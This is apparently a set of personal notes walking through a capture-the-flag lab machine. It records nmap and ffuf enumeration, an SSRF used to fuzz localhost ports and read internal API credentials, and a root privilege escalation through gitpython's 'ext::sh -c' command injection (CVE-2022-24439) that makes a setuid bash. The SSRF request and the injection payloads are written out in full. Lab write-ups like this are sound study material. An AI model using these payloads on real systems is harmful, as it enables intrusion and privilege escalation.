# Lessons Learned - If a website allows us to enter a URL - Test pulling a file from Kali http server - Test SSRF by pulling file from `http://127.0.0.1:80` and other ports - `ffuf` has the `-ac` flag that auto-filters responses - we can also use the `-request` flag with `ffuf` like `sqlmap -r` - when sending a POST request, we can change boundary tags between firefox and chromium to observe different behavior - also we can strip out a lot of unnecessary headers - NOTEL spacing and newlines matter in POST requests > pay close attention --- # After-Action Attack Sequence - BLUF: xxx - xxx --- # Discover Ports & Services - `ping` test![[images/Pasted image 20260712151059.png]] - `nmap` scan - light![[images/Pasted image 20260712151113.png]] - `nmap` scan - detailed ![[images/Pasted image 20260712151227.png]] - `nmap` scan - UDP![[images/Pasted image 20260712151507.png]] --- # Port 80 (HTTP): nginx 1.18.0 ## Initial Enum - visit page ![[images/Pasted image 20260712151555.png]] - `request:response` in burp![[images/Pasted image 20260712151621.png]] - `robots.txt` > 404 - `sitemap.xml` > 404 - `index.html` > 404 - `index.php` > 404 - rando page > 404 - response headers ![[images/Pasted image 20260712151740.png]] - methods![[images/Pasted image 20260712151745.png]] - `whatweb` scan ![[images/Pasted image 20260712151820.png]] - `/upload` looks very interesting ![[images/Pasted image 20260712151834.png]] ## Fuzzing - directory ![[images/Pasted image 20260712153205.png]] - subdomains![[images/Pasted image 20260712153458.png]] - vhosts ![[images/Pasted image 20260712153535.png]] ## `/upload` - test upload with random `.txt` file ![[images/Pasted image 20260712152111.png]] - `request:response` in burp > POST request ![[images/Pasted image 20260712152140.png]] - i dont see the `.txt` file in this POST form - try `preview` button for upload mechanism > ahh ![[images/Pasted image 20260712152407.png]] - shows the text of the file in the reqeust and the upload location in the response - there is an immediate GET request that follows the POST, but I cannot visit the upload location afterwards ![[images/Pasted image 20260712153014.png]] - `nuceli` scan ![[images/Pasted image 20260712154030.png]] - `sqlmap` on `/upload` ![[images/Pasted image 20260712154201.png]] - since `nuceli` shows that a WAF may be in play, run again ```bash sqlmap -r upload.req --batch --tamper=space2comment --random-agent ``` ![[images/Pasted image 20260712154259.png]] ## `/upload-cover` ### php revshell - try to upload below php revshell ![[images/Pasted image 20260712154611.png]] - POST ![[images/Pasted image 20260712154754.png]] - GET ![[images/Pasted image 20260712154746.png]] - no hit on listener ### php webshell - try to upload below php webshell ![[images/Pasted image 20260712154923.png]] - when i go to interact with the uploaded file I get the webshell back ![[images/Pasted image 20260712155053.png]] - either the php extension is being stripped (likely because none of the pages show up as `.php` or the upload location does not allow script execution ### SSRF #### test - first, try to pull a file from Kali - setup HTTP server on Kali and host a test file ```bash touch text python3 -m http.server ``` - now in the URL field enter: `http://10.10.14.173:8000/text` - we have a hit on our HTTP server ![[images/Pasted image 20260712193924.png]] #### localhost - try localhost on target - we are getting different behavior in response ![[images/Pasted image 20260712194117.png]] - try `127.0.0.1:80` ![[images/Pasted image 20260712194222.png]] ##### `intruder` - now let's loop over ports with `intruder`![[images/Pasted image 20260712194652.png]] - man this is SLOW because we dont have brup pro ![[images/Pasted image 20260712195203.png]] - NOTE: `intruder` only got to port 351 while i was doing the below steps with `ffuf` ##### `ffuf` - while waiting on the above, lets use `ffuf` - setup a word list and a POST `.req` file ```bash printf "%s\n" {1..10000} > numbers.txt ``` ![[images/Pasted image 20260712195740.png]] ```bash POST /upload-cover HTTP/1.1 Host: editorial.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=----geckoformboundaryebaeace69c42ccc6aa59ffe1eba354bd Content-Length: 354 Origin: http://editorial.htb Connection: keep-alive Referer: http://editorial.htb/upload Priority: u=0 ------geckoformboundaryebaeace69c42ccc6aa59ffe1eba354bd Content-Disposition: form-data; name="bookurl" http://127.0.0.1:FUZZ ------geckoformboundaryebaeace69c42ccc6aa59ffe1eba354bd Content-Disposition: form-data; name="bookfile"; filename="text" Content-Type: application/octet-stream ------geckoformboundaryebaeace69c42ccc6aa59ffe1eba354bd-- ``` - run the `ffuf` command ```bash ffuf -u http://editorial.htb/upload-cover -request upload-cover.post.req -w numbers.txt -ac ``` - not getting anything ![[images/Pasted image 20260712201512.png]] - let's remove unnecessary headers from our POST request give it boundary markers associated with the chromium browser ```bash POST /upload-cover HTTP/1.1 Host: editorial.htb Content-Type: multipart/form-data; boundary=---------------------------17227051210845347502863409435 -----------------------------17227051210845347502863409435 Content-Disposition: form-data; name="bookurl" http://127.0.0.1:FUZZ -----------------------------17227051210845347502863409435 Content-Disposition: form-data; name="bookfile"; filename="" Content-Type: application/octet-stream -----------------------------17227051210845347502863409435-- ``` - now we got a hit on port 5000 ![[images/Pasted image 20260712201542.png]] ##### interact with port 5000 - we have a different output in the response ![[images/Pasted image 20260712202225.png]] - hit this page with `curl` ![[images/Pasted image 20260712202420.png]] - we are getting some json output - throw into a file and pipe to `jq` ![[images/Pasted image 20260712202445.png]] - start `curl`-ing these API endpoints ![[images/Pasted image 20260712202714.png]] - oh right this is only on localhost - instead, let's append these API endpoints to `http://127.0.0.1:5000` ![[images/Pasted image 20260712203507.png]] - then `curl` the new upload ![[images/Pasted image 20260712203529.png]] - more json output ![[images/Pasted image 20260712203624.png]] - we have creds for `dev` --- # shell as `dev` - we cannot use `sudo` as `dev`, but we see user `prod` is named `Alirio Acosta` ![[images/Pasted image 20260712204017.png]] - networking ![[images/Pasted image 20260712204053.png]] - `/home/dev/apps` has `.git` - look at logs ![[images/Pasted image 20260712204423.png]] - instead run: `git log -p` - we have creds for `prod` --- # shell as `prod` ## initial enum - initial enum ![[images/Pasted image 20260712205507.png]] - we can run a python script as root - let's review the script![[images/Pasted image 20260712205632.png]] - review script's dir ![[images/Pasted image 20260712210031.png]] - we can write to this dir ## privsec - try this command sequence ```bash sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c cp /bin/bash% /tmp/% &&% chmod% +s% /tmp/rootbash" /tmp/rootbash -p ``` - not working - after some more Googling we find [Remote Code Execution (RCE) in gitpython | CVE-2022-24439 | Snyk](https://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858) - based on this try the below command ```bash sudo python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c touch% /tmp/pwned2" ``` - that created `/tmp/pwnd2` owner by root - let's try to break the above `rootbash` command into parts ```bash sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c cp% /bin/bash% /tmp/rootbash2" sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c chmod% +s% /tmp/rootbash2" /tmp/rootbash2 -p ``` - that worked! ![[images/Pasted image 20260712214839.png]]